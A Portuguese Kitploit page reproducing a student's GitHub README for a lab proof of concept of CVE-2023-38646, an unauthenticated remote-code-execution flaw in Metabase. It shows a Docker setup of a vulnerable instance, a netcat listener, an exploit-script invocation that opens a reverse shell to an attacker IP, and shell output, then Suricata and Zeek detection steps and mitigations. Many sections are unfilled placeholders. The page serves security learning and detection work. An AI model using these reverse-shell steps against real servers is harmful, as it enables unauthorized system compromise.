Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Metabase-Pre-Auth-RCE-POC — CVE-2023-38646 | Kitploit
Ferramentas/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Ferramentas DefensivasAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoDetecção de IntrusãoAprendizado e EducaçãoResposta a IncidentesDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

Ver Repositório
3há 5 mesesAinda não revisado
Compartilhar

CVE-2023-38646 — Metabase Execução Remota de Código (RCE) Prova de Conceito

Visão Geral

Este repositório documenta um projeto de pesquisa de segurança Prova de Conceito (PoC) analisando CVE-2023-38646, uma vulnerabilidade crítica de Execução Remota de Código (RCE) sem autenticação que afeta versões vulneráveis do Metabase.

O objetivo deste projeto é demonstrar o ciclo de vida completo de uma vulnerabilidade real, incluindo:

  • Compreender a vulnerabilidade e sua causa raiz
  • Reproduzir o exploit em um ambiente de laboratório controlado
  • Estabelecer um reverse shell no sistema vulnerável
  • Observar o comportamento do ataque através de ferramentas de monitoramento de rede
  • Demonstrar técnicas de engenharia de detecção
  • Propor estratégias de mitigação defensivas

Este repositório foi projetado para demonstrar habilidades práticas em:

  • Pesquisa de vulnerabilidades
  • Reprodução de exploits
  • Uso de reverse shell
  • Análise de tráfego de rede
  • Sistemas de detecção de intrusão
  • Estratégias de mitigação de segurança

Contexto da Vulnerabilidade

CVE-2023-38646 é uma vulnerabilidade crítica que afeta certas versões do Metabase, uma plataforma de business intelligence e análise de código aberto.

A vulnerabilidade permite que um atacante realize execução remota de código não autenticada explorando fraquezas no processo de configuração ou instalação da aplicação.

Detalhes principais:

Baixar ferramenta
  • CVE ID: CVE-2023-38646
  • Severidade: Crítica
  • Pontuação CVSS: 9.8
  • Vetor de Ataque: Rede
  • Autenticação Necessária: Não
  • Impacto: Execução Remota de Código (RCE)

A exploração bem-sucedida permite que um atacante:

  • Executar comandos arbitrários no sistema alvo
  • Estabelecer um reverse shell
  • Potencialmente obter comprometimento total do sistema

Referências oficiais:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

Tecnologias e Ferramentas Utilizadas

Este projeto combina tanto ferramentas ofensivas de segurança quanto ferramentas defensivas de monitoramento.

Segurança Ofensiva

  • Python
  • Payloads de reverse shell
  • Script de exploit personalizado
  • Instância vulnerável do Metabase

Detecção & Monitoramento

  • Suricata — Sistema de Detecção de Intrusão (IDS)
  • Zeek — Monitoramento de Segurança de Rede (NSM)

Tecnologias Defensivas

  • ModSecurity — Firewall de Aplicação Web
  • OSSEC — Sistema de Detecção de Intrusão Baseado em Host

Ambiente de Laboratório

Placeholder — descreva sua configuração de laboratório

Exemplo:

  • Máquina atacante: Kali Linux
  • Máquina alvo: Servidor Metabase vulnerável
  • Máquina de monitoramento de rede: VM de monitoramento de segurança

Prova de Conceito de Exploração

Diagrama da Cadeia de Ataque

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Vulnerable Metabase Instance]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell Established]
    E --> F[Command Execution on Target]

Este diagrama ilustra o fluxo de ataque de alto nível utilizado neste projeto.

Configuração da Prova de Conceito (PoC)

Instalação e Configuração do Docker:

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Iniciação do Docker:

Uma instância vulnerável do Metabase Enterprise (v1.44.0) foi implantada usando Docker.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

Isto expõe a interface web do Metabase na porta 3000, permitindo acesso à página de configuração.

Se o Docker já estiver em execução, execute os seguintes comandos para recomeçar:

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

'Docker Setup' Placeholder

Assim que o contêiner estiver em execução, a interface do Metabase torna-se acessível através do navegador.

root@kitploit:~
    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

A página de configuração confirma que a instância do Metabase está ativa e pronta para configuração.

Cenário de Exploração 1

BurpSuite

Demonstração / Documentação

Placeholder para capturas de tela ou explicação

Cenário de Exploração 2 - Exploit com Script Python

  1. Preparação do Ouvinte Reverse Shell

Antes de lançar o exploit, um ouvinte Netcat é iniciado na máquina atacante para receber a conexão reverse shell.

root@kitploit:~
    nc -lvnp 6666

Este ouvinte aguarda conexões recebidas do servidor Metabase explorado.

Placeholder para capturas de tela ou explicação

  1. Execução do Exploit

O script de exploit é executado a partir da máquina atacante.

root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit Name
    --rhost http://192.168.1.136:3000 \         ---> Targer IP Address
    --lhost 192.168.1.137 \                     ---> Attacker's IP Address
    --lport 6666                                ---> Attacker's Listening Port

O payload executa um comando que estabelece um reverse shell de volta para a máquina atacante.

  1. Reverse Shell Estabelecido

Assim que o payload é executado com sucesso, a instância vulnerável do Metabase inicia uma conexão de volta para a máquina atacante.

O ouvinte Netcat recebe a conexão, concedendo ao atacante acesso ao shell do sistema.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

Para confirmação da conexão ao dispositivo da vítima:

root@kitploit:~
    whoami

Saída:

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

Prova de Conceito de Engenharia de Detecção

Este projeto também demonstra como a atividade de exploração pode ser detectada usando ferramentas de monitoramento de rede.

Detecção com Suricata

Suricata (IDS) foi utilizado para monitorar o tráfego de rede em busca de padrões suspeitos associados ao exploit.

root@kitploit:~
sudo suricata -i eth0

Placeholder: Inserir captura de tela do alerta Suricata

root@kitploit:~
evidence/detection/suricata_alert.png

Para observar alertas em tempo real, os logs do Suricata foram monitorados usando:

root@kitploit:~
tail -f /var/log/suricata/fast.log

Placeholder: Inserir captura de tela do log Suricata

root@kitploit:~
evidence/detection/suricata_log.png

Para uma abordagem passiva, um script de notificação personalizado foi usado para gerar alertas na área de trabalho sempre que o Suricata detecta tráfego suspeito.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

Quando o exploit foi executado, o Suricata gerou alertas indicando atividade suspeita associada à tentativa de exploração do Metabase.

Placeholder: Inserir captura de tela do log Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Exemplo:

Placeholder: Inserir captura de tela do log Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Análise de Rede com Zeek

Além do monitoramento IDS, o Zeek foi utilizado para analisar o tráfego de rede e identificar comportamentos anômalos.

O Zeek é iniciado usando estes comandos para começar a capturar e analisar o tráfego de rede:

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

Placeholder: Inserir captura de tela da iniciação do Zeek

root@kitploit:~
evidence/detection/zeek.png

Inspecionando os logs de conexão, o tráfego reverse shell na porta 6666 pode ser observado.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

Placeholder: Inserir captura de tela do log Zeek

root@kitploit:~
evidence/detection/zeek_log.png

Mitigação e Estratégias Defensivas

Várias estratégias de mitigação podem reduzir o risco de exploração.

EstratégiaDescrição
Gerenciamento de PatchesAtualizar o Metabase para uma versão que corrija CVE-2023-38646
Firewall de Aplicação Web (ModSecurity)Filtrar requisições HTTP maliciosas
Detecção de Intrusão em Host (OSSEC)Monitorar comportamento suspeito do sistema
Monitoramento de Rede (Suricata & Zeek)Detectar padrões de tráfego anormais

Estrutura do Repositório

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

Resumo

Este projeto demonstra o ciclo de vida completo de análise e reprodução de uma vulnerabilidade crítica real.

A PoC demonstra:

  • análise de vulnerabilidade
  • reprodução de exploit
  • execução de reverse shell
  • monitoramento de tráfego de rede
  • detecção de intrusão
  • estratégias de mitigação defensiva

O objetivo deste repositório é fornecer um estudo de caso técnico ilustrando tanto práticas ofensivas quanto defensivas de cibersegurança.


🖋️ Autor

Styverson Ng

Bacharel em Tecnologia da Informação
Inteligência Artificial e Sistemas Autônomos
Segurança Cibernética e Perícia Cibernética

Murdoch University